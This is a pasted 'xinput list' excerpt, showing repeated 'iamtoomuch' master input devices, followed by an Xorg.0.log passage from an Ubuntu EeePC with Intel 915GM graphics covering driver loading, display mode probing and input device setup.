    â†³ Virtual core XTEST keyboard             	id=5	[slave  keyboard (3)]
    â†³ Power Button                            	id=6	[slave  keyboard (3)]
    â†³ Video Bus                               	id=7	[slave  keyboard (3)]
    â†³ Power Button                            	id=8	[slave  keyboard (3)]
    â†³ Sleep Button                            	id=9	[slave  keyboard (3)]
    â†³ UVC Camera (eb1a:2761)                  	id=10	[slave  keyboard (3)]
    â†³ Asus EeePC extra buttons                	id=11	[slave  keyboard (3)]
    â†³ AT Translated Set 2 keyboard            	id=12	[slave  keyboard (3)]
âŽ¡ iamtoomuch pointer                      	id=14	[master pointer  (15)]
âŽœ   â†³ iamtoomuch XTEST pointer                	id=16	[slave  pointer  (14)]
âŽ£ iamtoomuch keyboard                     	id=15	[master keyboard (14)]
    â†³ iamtoomuch XTEST keyboard               	id=17	[slave  keyboard (15)]
âŽ¡ iamtoomuch pointer                      	id=18	[master pointer  (19)]
âŽœ   â†³ iamtoomuch XTEST pointer                	id=20	[slave  pointer  (18)]
âŽ£ iamtoomuch keyboard                     	id=19	[master keyboard (18)]
    â†³ iamtoomuch XTEST keyboard               	id=21	[slave  keyboard (19)]
âŽ¡ iamtoomuch pointer                      	id=22	[master pointer  (23)]
âŽœ   â†³ iamtoomuch XTEST pointer                	id=24	[slave  pointer  (22)]
âŽ£ iamtoomuch keyboard                     	id=23	[master keyboard (22)]
    â†³ iamtoomuch XTEST keyboard               	id=25	[slave  keyboard (23)]
âŽ¡ iamtoomuch pointer                      	id=26	[master pointer  (27)]
âŽœ   â†³ iamtoomuch XTEST pointer                	id=28	[slave  pointer  (26)]
âŽ£ iamtoomuch keyboard                     	id=27	[master keyboard (26)]
    â†³ iamtoomuch XTEST keyboard               	id=29	[slave  keyboard (27)]
âŽ¡ iamtoomuch pointer                      	id=30	[master pointer  (31)]
âŽœ   â†³ iamtoomuch XTEST pointer                	id=32	[slave  pointer  (30)]
âŽ£ iamtoomuch keyboard                     	id=31	[master keyboard (30)]
    â†³ iamtoomuch XTEST keyboard               	id=33	[slave  keyboard (31)]
âŽ¡ iamtoomuch pointer                      	id=34	[master pointer  (35)]
âŽœ   â†³ iamtoomuch XTEST pointer                	id=36	[slave  pointer  (34)]
âŽ£ iamtoomuch keyboard                     	id=35	[master keyboard (34)]
    â†³ iamtoomuch XTEST keyboard               	id=37	[slave  keyboard (35)]
âŽ¡ iamtoomuch pointer                      	id=38	[master pointer  (0)]
âŽ£ iamtoomuch keyboard                     	id=39	[master keyboard (0)]
--snap--
Xorg.0.log:
--snip
[  2383.930] 
X.Org X Server 1.9.0
Release Date: 2010-08-20
[  2383.930] X Protocol Version 11 Revision 0
[  2383.930] Build Operating System: Linux 2.6.24-27-server i686 Ubuntu
[  2383.930] Current Operating System: Linux collabhub 2.6.35-22-generic #35-Ubuntu SMP Sat Oct 16 20:36:48 UTC 2010 i686
[  2383.930] Kernel command line: root=UUID=aed23c68-02aa-4b50-95c3-cb14accde24c ro quiet splash 
[  2383.930] Build Date: 16 September 2010  05:39:22PM
[  2383.930] xorg-server 2:1.9.0-0ubuntu7 (For technical support please see http://www.ubuntu.com/support) 
[  2383.930] Current version of pixman: 0.18.4
[  2383.930] 	Before reporting problems check http://wiki.x.org
	to make sure that you have the latest version.
[  2383.930] Markers: (--) probed (**) from config file (==) default setting
	(++) from command line (!!) notice (II) informational
	(WW) warning (EE) error (NI) not implemented (??) unknown.
[  2383.931] (==) Log file: /var/log/Xorg.0.log Time: Thu Nov  4 19:56:45 2010
[  2383.931] (==) Using system config directory /usr/share/X11/xorg.conf.d
[  2383.940] (==) No Layout section.  Using the first Screen section.
[  2383.940] (==) No screen section available. Using defaults.
[  2383.940] (**) |--&gt;Screen Default Screen Section (0)
[  2383.941] (**) |   |--&gt;Monitor 
[  2383.941] (==) No monitor specified for screen Default Screen Section.
	Using a default monitor configuration.
[  2383.941] (==) Automatically adding devices
[  2383.942] (==) Automatically enabling devices
[  2383.942] (WW) The directory /usr/share/fonts/X11/cyrillic does not exist.
[  2383.942] 	Entry deleted from font path.
[  2383.942] (==) FontPath set to:
	/usr/share/fonts/X11/misc
	/usr/share/fonts/X11/100dpi/:unscaled
	/usr/share/fonts/X11/75dpi/:unscaled
	/usr/share/fonts/X11/Type1
	/usr/share/fonts/X11/100dpi
	/usr/share/fonts/X11/75dpi
	/var/lib/defoma/x-ttcidfont-conf.d/dirs/TrueType
	built-ins
[  2383.942] (==) ModulePath set to /usr/lib/xorg/extra-modules/usr/lib/xorg/modules
[  2383.942] (II) The server relies on udev to provide the list of input devices.
	If no devices become available reconfigure udev or disable AutoAddDevices.
[  2383.942] (II) Loader magic: 0x81f8e00
[  2383.942] (II) Module ABI versions:
[  2383.942] 	X.Org ANSI C Emulation: 0.4
[  2383.942] 	X.Org Video Driver: 8.0
[  2383.942] 	X.Org XInput driver : 11.0
[  2383.942] 	X.Org Server Extension : 4.0
[  2383.957] (--) PCI:*(0:0:2:0) 8086:2592:1043:82d9 rev 4 Mem @ 0xf7f00000/524288 0xd0000000/268435456 0xf7ec0000/262144 I/O @ 0x0000ec00/8
[  2383.957] (--) PCI: (0:0:2:1) 8086:2792:1043:82d9 rev 4 Mem @ 0xf7f80000/524288
[  2383.958] (II) Open ACPI successful (/var/run/acpid.socket)
[  2383.958] (II) LoadModule: extmod
[  2383.959] (II) Loading /usr/lib/xorg/modules/extensions/libextmod.so
[  2383.959] (II) Module extmod: vendor=X.Org Foundation
[  2383.959] 	compiled for 1.9.0 module version = 1.0.0
[  2383.972] 	Module class: X.Org Server Extension
[  2383.972] 	ABI class: X.Org Server Extension version 4.0
[  2383.972] (II) Loading extension MIT-SCREEN-SAVER
[  2383.973] (II) Loading extension XFree86-VidModeExtension
[  2383.973] (II) Loading extension XFree86-DGA
[  2383.973] (II) Loading extension DPMS
[  2383.973] (II) Loading extension XVideo
[  2383.973] (II) Loading extension XVideo-MotionCompensation
[  2383.973] (II) Loading extension X-Resource
[  2383.973] (II) LoadModule: dbe
[  2383.974] (II) Loading /usr/lib/xorg/modules/extensions/libdbe.so
[  2383.974] (II) Module dbe: vendor=X.Org Foundation
[  2383.974] 	compiled for 1.9.0 module version = 1.0.0
[  2383.974] 	Module class: X.Org Server Extension
[  2383.974] 	ABI class: X.Org Server Extension version 4.0
[  2383.974] (II) Loading extension DOUBLE-BUFFER
[  2383.974] (II) LoadModule: glx
[  2383.975] (II) Loading /usr/lib/xorg/modules/extensions/libglx.so
[  2383.975] (II) Module glx: vendor=X.Org Foundation
[  2383.975] 	compiled for 1.9.0 module version = 1.0.0
[  2383.975] 	ABI class: X.Org Server Extension version 4.0
[  2383.975] (==) AIGLX enabled
[  2383.979] (II) Loading extension GLX
[  2383.979] (II) LoadModule: record
[  2383.980] (II) Loading /usr/lib/xorg/modules/extensions/librecord.so
[  2383.980] (II) Module record: vendor=X.Org Foundation
[  2383.981] 	compiled for 1.9.0 module version = 1.13.0
[  2383.981] 	Module class: X.Org Server Extension
[  2383.981] 	ABI class: X.Org Server Extension version 4.0
[  2383.981] (II) Loading extension RECORD
[  2383.981] (II) LoadModule: dri
[  2383.981] (II) Loading /usr/lib/xorg/modules/extensions/libdri.so
[  2383.982] (II) Module dri: vendor=X.Org Foundation
[  2383.982] 	compiled for 1.9.0 module version = 1.0.0
[  2383.982] 	ABI class: X.Org Server Extension version 4.0
[  2383.982] (II) Loading extension XFree86-DRI
[  2383.982] (II) LoadModule: dri2
[  2383.983] (II) Loading /usr/lib/xorg/modules/extensions/libdri2.so
[  2383.983] (II) Module dri2: vendor=X.Org Foundation
[  2383.983] 	compiled for 1.9.0 module version = 1.2.0
[  2383.983] 	ABI class: X.Org Server Extension version 4.0
[  2383.983] (II) Loading extension DRI2
[  2383.996] (==) Matched intel as autoconfigured driver 0
[  2383.996] (==) Matched vesa as autoconfigured driver 1
[  2383.996] (==) Matched fbdev as autoconfigured driver 2
[  2383.996] (==) Assigned the driver to the xf86ConfigLayout
[  2383.996] (II) LoadModule: intel
[  2383.997] (II) Loading /usr/lib/xorg/modules/drivers/intel_drv.so
[  2383.997] (II) Module intel: vendor=X.Org Foundation
[  2383.997] 	compiled for 1.9.0 module version = 2.12.0
[  2383.997] 	Module class: X.Org Video Driver
[  2383.997] 	ABI class: X.Org Video Driver version 8.0
[  2383.997] (II) LoadModule: vesa
[  2383.998] (II) Loading /usr/lib/xorg/modules/drivers/vesa_drv.so
[  2383.998] (II) Module vesa: vendor=X.Org Foundation
[  2383.998] 	compiled for 1.8.99.905 module version = 2.3.0
[  2383.998] 	Module class: X.Org Video Driver
[  2383.998] 	ABI class: X.Org Video Driver version 8.0
[  2383.999] (II) LoadModule: fbdev
[  2383.999] (II) Loading /usr/lib/xorg/modules/drivers/fbdev_drv.so
[  2383.999] (II) Module fbdev: vendor=X.Org Foundation
[  2383.999] 	compiled for 1.8.99.905 module version = 0.4.2
[  2383.999] 	ABI class: X.Org Video Driver version 8.0
[  2383.999] (II) intel: Driver for Intel Integrated Graphics Chipsets: i810
	i810-dc100 i810e i815 i830M 845G 852GM/855GM 865G 915G
	E7221 (i915) 915GM 945G 945GM 945GME Pineview GM Pineview G
	965G G35 965Q 946GZ 965GM 965GME/GLE G33 Q35 Q33 GM45
	4 Series G45/G43 Q45/Q43 G41 B43 B43 Clarkdale Arrandale
	Sandybridge Sandybridge Sandybridge Sandybridge Sandybridge
	Sandybridge Sandybridge
[  2384.008] (II) VESA: driver for VESA chipsets: vesa
[  2384.008] (II) FBDEV: driver for framebuffer: fbdev
[  2384.008] (--) using VT number 8
[  2384.023] (WW) Falling back to old probe method for vesa
[  2384.024] (WW) Falling back to old probe method for fbdev
[  2384.024] (II) Loading sub module fbdevhw
[  2384.024] (II) LoadModule: fbdevhw
[  2384.025] (II) Loading /usr/lib/xorg/modules/libfbdevhw.so
[  2384.025] (II) Module fbdevhw: vendor=X.Org Foundation
[  2384.025] 	compiled for 1.9.0 module version = 0.0.2
[  2384.025] 	ABI class: X.Org Video Driver version 8.0
[  2384.040] drmOpenDevice: node name is /dev/dri/card0
[  2384.040] drmOpenDevice: open result is 9 (OK)
[  2384.064] drmOpenByBusid: Searching for BusID pci:0000:00:02.0
[  2384.064] drmOpenDevice: node name is /dev/dri/card0
[  2384.064] drmOpenDevice: open result is 9 (OK)
[  2384.064] drmOpenByBusid: drmOpenMinor returns 9
[  2384.064] drmOpenByBusid: drmGetBusid reports pci:0000:00:02.0
[  2384.064] (II) intel(0): Creating default Display subsection in Screen section
	Default Screen Section for depth/fbbpp 24/32
[  2384.064] (==) intel(0): Depth 24 (--) framebuffer bpp 32
[  2384.064] (==) intel(0): RGB weight 888
[  2384.064] (==) intel(0): Default visual is TrueColor
[  2384.064] (II) intel(0): Integrated Graphics Chipset: Intel(R) 915GM
[  2384.065] (--) intel(0): Chipset: 915GM
[  2384.065] (==) intel(0): video overlay key set to 0x101fe
[  2384.320] (II) intel(0): Output VGA1 has no monitor section
[  2384.320] (II) intel(0): Output LVDS1 has no monitor section
[  2384.320] (II) intel(0): found backlight control interface /sys/class/backlight/eeepc
[  2384.656] (II) intel(0): Output TV1 has no monitor section
[  2384.904] (II) intel(0): EDID for output VGA1
[  2384.904] (II) intel(0): EDID for output LVDS1
[  2384.905] (II) intel(0): Not using default mode 320x240 (doublescan mode not supported)
[  2384.905] (II) intel(0): Not using default mode 400x300 (doublescan mode not supported)
[  2384.905] (II) intel(0): Not using default mode 400x300 (doublescan mode not supported)
[  2384.905] (II) intel(0): Not using default mode 512x384 (doublescan mode not supported)
[  2384.905] (II) intel(0): Not using default mode 640x480 (doublescan mode not supported)
[  2384.906] (II) intel(0): Not using default mode 576x432 (doublescan mode not supported)
[  2384.906] (II) intel(0): Not using default mode 680x384 (doublescan mode not supported)
[  2384.906] (II) intel(0): Not using default mode 680x384 (doublescan mode not supported)
[  2384.906] (II) intel(0): Not using default mode 720x450 (doublescan mode not supported)
[  2384.906] (II) intel(0): Not using default mode 320x175 (doublescan mode not supported)
[  2384.906] (II) intel(0): Not using default mode 320x200 (doublescan mode not supported)
[  2384.906] (II) intel(0): Not using default mode 360x200 (doublescan mode not supported)
[  2384.906] (II) intel(0): Not using default mode 320x240 (doublescan mode not supported)
[  2384.906] (II) intel(0): Not using default mode 320x240 (doublescan mode not supported)
[  2384.906] (II) intel(0): Not using default mode 320x240 (doublescan mode not supported)
[  2384.906] (II) intel(0): Not using default mode 320x240 (doublescan mode not supported)
[  2384.906] (II) intel(0): Not using default mode 800x600 (vrefresh out of range)
[  2384.906] (II) intel(0): Not using default mode 400x300 (doublescan mode not supported)
[  2384.906] (II) intel(0): Not using default mode 800x600 (exceeds panel dimensions)
[  2384.906] (II) intel(0): Not using default mode 400x300 (doublescan mode not supported)
[  2384.906] (II) intel(0): Not using default mode 800x600 (exceeds panel dimensions)
[  2384.906] (II) intel(0): Not using default mode 400x300 (doublescan mode not supported)
[  2384.906] (II) intel(0): Not using default mode 800x600 (exceeds panel dimensions)
[  2384.906] (II) intel(0): Not using default mode 400x300 (doublescan mode not supported)
[  2384.906] (II) intel(0): Not using default mode 800x600 (exceeds panel dimensions)
[  2384.906] (II) intel(0): Not using default mode 400x300 (doublescan mode not supported)
[  2384.906] (II) intel(0): Not using default mode 1024x768i (interlace mode not supported)
[  2384.906] (II) intel(0): Not using default mode 512x384i (doublescan mode not supported)
[  2384.906] (II) intel(0): Not using default mode 1024x768 (exceeds panel dimensions)
[  2384.906] (II) intel(0): Not using default mode 512x384 (doublescan mode not supported)
[  2384.907] (II) intel(0): Not using default mode 1024x768 (exceeds panel dimensions)
[  2384.907] (II) intel(0): Not using default mode 512x384 (doublescan mode not supported)
[  2384.907] (II) intel(0): Not using default mode 1024x768 (exceeds panel dimensions)
[  2384.907] (II) intel(0): Not using default mode 512x384 (doublescan mode not supported)
[  2384.907] (II) intel(0): Not using default mode 1024x768 (hsync out of range)
[  2384.907] (II) intel(0): Not using default mode 512x384 (doublescan mode not supported)
[  2384.907] (II) intel(0): Not using default mode 1152x864 (hsync out of range)
[  2384.907] (II) intel(0): Not using default mode 576x432 (doublescan mode not supported)
[  2384.907] (II) intel(0): Not using default mode 1280x960 (exceeds panel dimensions)
[  2384.907] (II) intel(0): Not using default mode 640x480 (doublescan mode not supported)
[  2384.907] (II) intel(0): Not using default mode 1280x960 (hsync out of range)
[  2384.907] (II) intel(0): Not using default mode 640x480 (doublescan mode not supported)
[  2384.907] (II) intel(0): Not using default mode 1280x1024 (hsync out of range)
[  2384.907] (II) intel(0): Not using default mode 640x512 (doublescan mode not supported)
[  2384.907] (II) intel(0): Not using default mode 1280x1024 (hsync out of range)
[  2384.907] (II) intel(0): Not using default mode 640x512 (doublescan mode not supported)
[  2384.907] (II) intel(0): Not using default mode 1280x1024 (hsync out of range)
[  2384.907] (II) intel(0): Not using default mode 640x512 (doublescan mode not supported)
[  2384.907] (II) intel(0): Not using default mode 1600x1200 (hsync out of range)
[  2384.907] (II) intel(0): Not using default mode 800x600 (doublescan mode not supported)
[  2384.907] (II) intel(0): Not using default mode 1600x1200 (hsync out of range)
[  2384.908] (II) intel(0): Not using default mode 800x600 (doublescan mode not supported)
[  2384.908] (II) intel(0): Not using default mode 1600x1200 (hsync out of range)
[  2384.908] (II) intel(0): Not using default mode 800x600 (doublescan mode not supported)
[  2384.908] (II) intel(0): Not using default mode 1600x1200 (hsync out of range)
[  2384.908] (II) intel(0): Not using default mode 800x600 (doublescan mode not supported)
[  2384.908] (II) intel(0): Not using default mode 1600x1200 (hsync out of range)
[  2384.908] (II) intel(0): Not using default mode 800x600 (doublescan mode not supported)
[  2384.908] (II) intel(0): Not using default mode 1792x1344 (hsync out of range)
[  2384.908] (II) intel(0): Not using default mode 896x672 (doublescan mode not supported)
[  2384.908] (II) intel(0): Not using default mode 1792x1344 (hsync out of range)
[  2384.908] (II) intel(0): Not using default mode 896x672 (doublescan mode not supported)
[  2384.908] (II) intel(0): Not using default mode 1856x1392 (hsync out of range)
[  2384.908] (II) intel(0): Not using default mode 928x696 (doublescan mode not supported)
[  2384.908] (II) intel(0): Not using default mode 1856x1392 (hsync out of range)
[  2384.908] (II) intel(0): Not using default mode 928x696 (doublescan mode not supported)
[  2384.908] (II) intel(0): Not using default mode 1920x1440 (hsync out of range)
[  2384.908] (II) intel(0): Not using default mode 960x720 (doublescan mode not supported)
[  2384.908] (II) intel(0): Not using default mode 1920x1440 (hsync out of range)
[  2384.908] (II) intel(0): Not using default mode 960x720 (doublescan mode not supported)
[  2384.908] (II) intel(0): Not using default mode 832x624 (exceeds panel dimensions)
[  2384.908] (II) intel(0): Not using default mode 416x312 (doublescan mode not supported)
[  2384.908] (II) intel(0): Not using default mode 1152x864 (exceeds panel dimensions)
[  2384.908] (II) intel(0): Not using default mode 576x432 (doublescan mode not supported)
[  2384.909] (II) intel(0): Not using default mode 1152x864 (hsync out of range)
[  2384.909] (II) intel(0): Not using default mode 576x432 (doublescan mode not supported)
[  2384.909] (II) intel(0): Not using default mode 1152x864 (hsync out of range)
[  2384.909] (II) intel(0): Not using default mode 576x432 (doublescan mode not supported)
[  2384.909] (II) intel(0): Not using default mode 1152x864 (hsync out of range)
[  2384.909] (II) intel(0): Not using default mode 576x432 (doublescan mode not supported)
[  2384.909] (II) intel(0): Not using default mode 1152x864 (hsync out of range)
[  2384.909] (II) intel(0): Not using default mode 576x432 (doublescan mode not supported)
[  2384.909] (II) intel(0): Not using default mode 1152x864 (hsync out of range)
[  2384.909] (II) intel(0): Not using default mode 576x432 (doublescan mode not supported)
[  2384.909] (II) intel(0): Not using default mode 1360x768 (monitor doesn't support reduced blanking)
[  2384.909] (II) intel(0): Not using default mode 680x384 (doublescan mode not supported)
[  2384.909] (II) intel(0): Not using default mode 1360x768 (exceeds panel dimensions)
[  2384.909] (II) intel(0): Not using default mode 680x384 (doublescan mode not supported)
[  2384.909] (II) intel(0): Not using default mode 1400x1050 (hsync out of range)
[  2384.909] (II) intel(0): Not using default mode 700x525 (doublescan mode not supported)
[  2384.909] (II) intel(0): Not using default mode 1400x1050 (hsync out of range)
[  2384.909] (II) intel(0): Not using default mode 700x525 (doublescan mode not supported)
[  2384.909] (II) intel(0): Not using default mode 1400x1050 (hsync out of range)
[  2384.909] (II) intel(0): Not using default mode 700x525 (doublescan mode not supported)
[  2384.909] (II) intel(0): Not using default mode 1400x1050 (hsync out of range)
[  2384.910] (II) intel(0): Not using default mode 700x525 (doublescan mode not supported)
[  2384.910] (II) intel(0): Not using default mode 1440x900 (exceeds panel dimensions)
[  2384.910] (II) intel(0): Not using default mode 720x450 (doublescan mode not supported)
[  2384.910] (II) intel(0): Not using default mode 1600x1024 (hsync out of range)
[  2384.910] (II) intel(0): Not using default mode 800x512 (doublescan mode not supported)
[  2384.910] (II) intel(0): Not using default mode 1680x1050 (hsync out of range)
[  2384.910] (II) intel(0): Not using default mode 840x525 (doublescan mode not supported)
[  2384.910] (II) intel(0): Not using default mode 1680x1050 (hsync out of range)
[  2384.910] (II) intel(0): Not using default mode 840x525 (doublescan mode not supported)
[  2384.910] (II) intel(0): Not using default mode 1680x1050 (hsync out of range)
[  2384.910] (II) intel(0): Not using default mode 840x525 (doublescan mode not supported)
[  2384.910] (II) intel(0): Not using default mode 1680x1050 (hsync out of range)
[  2384.910] (II) intel(0): Not using default mode 840x525 (doublescan mode not supported)
[  2384.910] (II) intel(0): Not using default mode 1680x1050 (hsync out of range)
[  2384.910] (II) intel(0): Not using default mode 840x525 (doublescan mode not supported)
[  2384.910] (II) intel(0): Not using default mode 1920x1080 (hsync out of range)
[  2384.910] (II) intel(0): Not using default mode 960x540 (doublescan mode not supported)
[  2384.910] (II) intel(0): Not using default mode 1920x1200 (hsync out of range)
[  2384.910] (II) intel(0): Not using default mode 960x600 (doublescan mode not supported)
[  2384.910] (II) intel(0): Not using default mode 1920x1440 (hsync out of range)
[  2384.910] (II) intel(0): Not using default mode 960x720 (doublescan mode not supported)
[  2384.910] (II) intel(0): Not using default mode 2048x1536 (hsync out of range)
[  2384.910] (II) intel(0): Not using default mode 1024x768 (doublescan mode not supported)
[  2384.910] (II) intel(0): Not using default mode 2048x1536 (hsync out of range)
[  2384.911] (II) intel(0): Not using default mode 1024x768 (doublescan mode not supported)
[  2384.911] (II) intel(0): Not using default mode 2048x1536 (hsync out of range)
[  2384.911] (II) intel(0): Not using default mode 1024x768 (doublescan mode not supported)
[  2384.911] (II) intel(0): Printing probed modes for output LVDS1
[  2384.911] (II) intel(0): Modeline 800x480x60.0   32.00  800 840 968 1056  480 481 484 505 -hsync -vsync (30.3 kHz)
[  2384.911] (II) intel(0): Modeline 640x480x85.0   36.00  640 696 752 832  480 481 484 509 -hsync -vsync (43.3 kHz)
[  2384.911] (II) intel(0): Modeline 640x480x72.8   31.50  640 664 704 832  480 489 492 520 -hsync -vsync (37.9 kHz)
[  2384.911] (II) intel(0): Modeline 640x480x75.0   31.50  640 656 720 840  480 481 484 500 -hsync -vsync (37.5 kHz)
[  2384.911] (II) intel(0): Modeline 640x480x59.9   25.18  640 656 752 800  480 490 492 525 -hsync -vsync (31.5 kHz)
[  2384.911] (II) intel(0): Modeline 720x400x85.0   35.50  720 756 828 936  400 401 404 446 -hsync +vsync (37.9 kHz)
[  2384.911] (II) intel(0): Modeline 640x400x85.1   31.50  640 672 736 832  400 401 404 445 -hsync +vsync (37.9 kHz)
[  2384.911] (II) intel(0): Modeline 640x350x85.1   31.50  640 672 736 832  350 382 385 445 +hsync -vsync (37.9 kHz)
[  2385.244] (II) intel(0): EDID for output TV1
[  2385.244] (II) intel(0): Output VGA1 disconnected
[  2385.244] (II) intel(0): Output LVDS1 connected
[  2385.244] (II) intel(0): Output TV1 disconnected
[  2385.244] (II) intel(0): Using exact sizes for initial modes
[  2385.244] (II) intel(0): Output LVDS1 using initial mode 800x480
[  2385.244] (II) intel(0): Using default gamma of (1.0 1.0 1.0) unless otherwise stated.
[  2385.244] (II) intel(0): Kernel page flipping support detected but forcibly disabled.
[  2385.244] (==) intel(0): DPI set to (96 96)
[  2385.244] (II) Loading sub module fb
[  2385.244] (II) LoadModule: fb
[  2385.245] (II) Loading /usr/lib/xorg/modules/libfb.so
[  2385.246] (II) Module fb: vendor=X.Org Foundation
[  2385.246] 	compiled for 1.9.0 module version = 1.0.0
[  2385.246] 	ABI class: X.Org ANSI C Emulation version 0.4
[  2385.246] (II) UnloadModule: vesa
[  2385.246] (II) Unloading /usr/lib/xorg/modules/drivers/vesa_drv.so
[  2385.246] (II) UnloadModule: fbdev
[  2385.246] (II) Unloading /usr/lib/xorg/modules/drivers/fbdev_drv.so
[  2385.246] (II) UnloadModule: fbdevhw
[  2385.246] (II) Unloading /usr/lib/xorg/modules/libfbdevhw.so
[  2385.246] (==) Depth 24 pixmap format is 32 bpp
[  2385.246] (II) intel(0): [DRI2] Setup complete
[  2385.246] (II) intel(0): [DRI2]   DRI driver: i915
[  2385.246] (**) intel(0): Tiling enabled
[  2385.246] (**) intel(0): SwapBuffers wait enabled
[  2385.246] (==) intel(0): VideoRam: 262144 KB
[  2385.247] (II) intel(0): Allocated new frame buffer 832x480 stride 4096 tiled
[  2385.247] (II) UXA(0): Driver registered support for the following operations:
[  2385.247] (II)         solid
[  2385.247] (II)         copy
[  2385.247] (II)         composite (RENDER acceleration)
[  2385.247] (II)         put_image
[  2385.247] (II)         get_image
[  2385.247] (==) intel(0): Backing store disabled
[  2385.247] (==) intel(0): Silken mouse enabled
[  2385.247] (II) intel(0): Initializing HW Cursor
[  2385.288] (II) intel(0): RandR 1.2 enabled ignore the following RandR disabled message.
[  2385.299] (==) intel(0): DPMS enabled
[  2385.299] (==) intel(0): Intel XvMC decoder disabled
[  2385.300] (II) intel(0): Set up textured video
[  2385.300] (II) intel(0): Set up overlay video
[  2385.300] (II) intel(0): direct rendering: DRI2 Enabled
[  2385.300] (--) RandR disabled
[  2385.300] (II) Initializing built-in extension Generic Event Extension
[  2385.300] (II) Initializing built-in extension SHAPE
[  2385.300] (II) Initializing built-in extension MIT-SHM
[  2385.300] (II) Initializing built-in extension XInputExtension
[  2385.300] (II) Initializing built-in extension XTEST
[  2385.300] (II) Initializing built-in extension BIG-REQUESTS
[  2385.300] (II) Initializing built-in extension SYNC
[  2385.301] (II) Initializing built-in extension XKEYBOARD
[  2385.301] (II) Initializing built-in extension XC-MISC
[  2385.301] (II) Initializing built-in extension SECURITY
[  2385.301] (II) Initializing built-in extension XINERAMA
[  2385.301] (II) Initializing built-in extension XFIXES
[  2385.301] (II) Initializing built-in extension RENDER
[  2385.301] (II) Initializing built-in extension RANDR
[  2385.301] (II) Initializing built-in extension COMPOSITE
[  2385.301] (II) Initializing built-in extension DAMAGE
[  2385.301] (II) Initializing built-in extension GESTURE
[  2385.353] (II) AIGLX: enabled GLX_MESA_copy_sub_buffer
[  2385.353] (II) AIGLX: enabled GLX_INTEL_swap_event
[  2385.353] (II) AIGLX: enabled GLX_SGI_swap_control and GLX_MESA_swap_control
[  2385.353] (II) AIGLX: enabled GLX_SGI_make_current_read
[  2385.353] (II) AIGLX: GLX_EXT_texture_from_pixmap backed by buffer objects
[  2385.353] (II) AIGLX: Loaded and initialized /usr/lib/dri/i915_dri.so
[  2385.353] (II) GLX: Initialized DRI2 GL provider for screen 0
[  2385.355] (II) intel(0): Setting screen physical size to 211 x 126
[  2385.431] (II) XKB: reuse xkmfile /var/lib/xkb/server-B20D7FC79C7F597315E3E501AEF10E0D866E8E92.xkm
[  2385.458] (II) config/udev: Adding input device Power Button (/dev/input/event3)
[  2385.458] (**) Power Button: Applying InputClass evdev keyboard catchall
[  2385.458] (II) LoadModule: evdev
[  2385.459] (II) Loading /usr/lib/xorg/modules/input/evdev_drv.so
[  2385.459] (II) Module evdev: vendor=X.Org Foundation
[  2385.459] 	compiled for 1.9.0 module version = 2.3.2
[  2385.460] 	Module class: X.Org XInput Driver
[  2385.460] 	ABI class: X.Org XInput driver version 11.0
[  2385.460] (**) Power Button: always reports core events
[  2385.460] (**) Power Button: Device: /dev/input/event3
[  2385.460] (II) Power Button: Found keys
[  2385.460] (II) Power Button: Configuring as keyboard
[  2385.460] (II) XINPUT: Adding extended input device Power Button (type: KEYBOARD)
[  2385.460] (**) Option xkb_rules evdev
[  2385.460] (**) Option xkb_model pc105
[  2385.460] (**) Option xkb_layout de
[  2385.471] (II) XKB: reuse xkmfile /var/lib/xkb/server-808BBA3D4C227BDB44C370226C34E44C5D69A4A9.xkm
[  2385.475] (II) config/udev: Adding input device Video Bus (/dev/input/event5)
[  2385.475] (**) Video Bus: Applying InputClass evdev keyboard catchall
[  2385.475] (**) Video Bus: always reports core events
[  2385.475] (**) Video Bus: Device: /dev/input/event5
[  2385.475] (II) Video Bus: Found keys
[  2385.475] (II) Video Bus: Configuring as keyboard
[  2385.475] (II) XINPUT: Adding extended input device Video Bus (type: KEYBOARD)
[  2385.475] (**) Option xkb_rules evdev
[  2385.475] (**) Option xkb_model pc105
[  2385.475] (**) Option xkb_layout de
[  2385.479] (II) config/udev: Adding input device Power Button (/dev/input/event2)
[  2385.480] (**) Power Button: Applying InputClass evdev keyboard catchall
[  2385.480] (**) Power Button: always reports core events
[  2385.480] (**) Power Button: Device: /dev/input/event2
[  2385.480] (II) Power Button: Found keys
[  2385.480] (II) Power Button: Configuring as keyboard
[  2385.480] (II) XINPUT: Adding extended input device Power Button (type: KEYBOARD)
[  2385.480] (**) Option xkb_rules evdev
[  2385.480] (**) Option xkb_model pc105
[  2385.480] (**) Option xkb_layout de
[  2385.482] (II) config/udev: Adding input device Lid Switch (/dev/input/event0)
[  2385.482] (II) No input driver/identifier specified (ignoring)
[  2385.483] (II) config/udev: Adding input device Sleep Button (/dev/input/event1)
[  2385.483] (**) Sleep Button: Applying InputClass evdev keyboard catchall
[  2385.483] (**) Sleep Button: always reports core events
[  2385.483] (**) Sleep Button: Device: /dev/input/event1
[  2385.483] (II) Sleep Button: Found keys
[  2385.483] (II) Sleep Button: Configuring as keyboard
[  2385.483] (II) XINPUT: Adding extended input device Sleep Button (type: KEYBOARD)
[  2385.483] (**) Option xkb_rules evdev
[  2385.483] (**) Option xkb_model pc105
[  2385.484] (**) Option xkb_layout de
[  2385.494] (II) config/udev: Adding input device UVC Camera (eb1a:2761) (/dev/input/event7)
[  2385.495] (**) UVC Camera (eb1a:2761): Applying InputClass evdev keyboard catchall
[  2385.495] (**) UVC Camera (eb1a:2761): always reports core events
[  2385.495] (**) UVC Camera (eb1a:2761): Device: /dev/input/event7
[  2385.495] (II) UVC Camera (eb1a:2761): Found keys
[  2385.495] (II) UVC Camera (eb1a:2761): Configuring as keyboard
[  2385.495] (II) XINPUT: Adding extended input device UVC Camera (eb1a:2761) (type: KEYBOARD)
[  2385.495] (**) Option xkb_rules evdev
[  2385.495] (**) Option xkb_model pc105
[  2385.495] (**) Option xkb_layout de
[  2385.501] (II) config/udev: Adding input device Asus EeePC extra buttons (/dev/input/event6)
[  2385.501] (**) Asus EeePC extra buttons: Applying InputClass evdev keyboard catchall
[  2385.501] (**) Asus EeePC extra buttons: always reports core events
[  2385.501] (**) Asus EeePC extra buttons: Device: /dev/input/event6
[  2385.501] (II) Asus EeePC extra buttons: Found keys
[  2385.501] (II) Asus EeePC extra buttons: Configuring as keyboard
[  2385.502] (II) XINPUT: Adding extended input device Asus EeePC extra buttons (type: KEYBOARD)
[  2385.502] (**) Option xkb_rules evdev
[  2385.502] (**) Option xkb_model pc105
[  2385.502] (**) Option xkb_layout de
[  2385.504] (II) config/udev: Adding input device AT Translated Set 2 keyboard (/dev/input/event4)
[  2385.504] (**) AT Translated Set 2 keyboard: Applying InputClass evdev keyboard catchall
[  2385.504] (**) AT Translated Set 2 keyboard: always reports core events
